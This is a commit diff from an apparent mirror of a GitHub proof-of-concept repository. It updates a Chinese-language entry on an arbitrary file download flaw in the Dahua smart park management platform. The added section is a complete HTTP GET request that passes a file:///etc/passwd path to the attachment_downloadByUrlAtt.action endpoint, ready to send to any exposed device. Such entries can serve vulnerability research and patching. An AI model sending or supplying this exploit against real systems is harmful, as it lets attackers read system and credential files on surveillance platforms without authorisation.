mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Update 大华智慧园区管理平台任意文件读取.md
This commit is contained in:
parent
cea0a6c494
commit
3e3fb77cf4
@ -1,9 +1,20 @@
|
||||
|
||||
## 大华智慧园区管理平台任意文件读取
|
||||
|
||||
大华 城市安防监控系统平台管理 任意文件下载漏洞
|
||||
|
||||

|
||||
|
||||
## poc
|
||||
```
|
||||
/portal/itc/attachment_downloadByUrlAtt.action?filePath=file:/
|
||||
GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1
|
||||
Host: ip:port
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: zh-CN,zh;q=0.9
|
||||
Connection: close
|
||||
```
|
||||
|
||||

|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user